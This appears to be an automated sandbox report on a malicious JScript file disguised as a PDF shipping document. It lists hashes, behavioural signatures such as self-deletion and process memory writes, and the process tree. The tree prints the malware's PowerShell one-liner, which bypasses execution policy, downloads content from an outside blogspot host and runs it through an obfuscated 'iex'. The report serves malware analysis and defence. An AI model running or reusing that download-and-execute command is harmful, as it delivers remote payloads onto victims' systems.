Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
17-01-2024 13:40
Static task
static1
Behavioral task
behavioral1
Sample
BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
Resource
win10v2004-20231222-en
General
-
Target
BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
Deletes itself 1 IoCs
Processes:
wscript.exepid process 2288 wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2208 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2208 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid process target process PID 2288 wrote to memory of 2208 2288 wscript.exe powershell.exe PID 2288 wrote to memory of 2208 2288 wscript.exe powershell.exe PID 2288 wrote to memory of 2208 2288 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\BL#ACU240141 & Doc#HLCUBKK240124139.pdf .js"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2208-4-0x000000001B660000-0x000000001B942000-memory.dmpFilesize
2.9MB
-
memory/2208-5-0x00000000023C0000-0x00000000023C8000-memory.dmpFilesize
32KB
-
memory/2208-10-0x0000000002C80000-0x0000000002D00000-memory.dmpFilesize
512KB
-
memory/2208-9-0x0000000002C80000-0x0000000002D00000-memory.dmpFilesize
512KB
-
memory/2208-8-0x0000000002C80000-0x0000000002D00000-memory.dmpFilesize
512KB
-
memory/2208-7-0x0000000002C80000-0x0000000002D00000-memory.dmpFilesize
512KB
-
memory/2208-11-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmpFilesize
9.6MB
-
memory/2208-6-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmpFilesize
9.6MB
-
memory/2208-12-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmpFilesize
9.6MB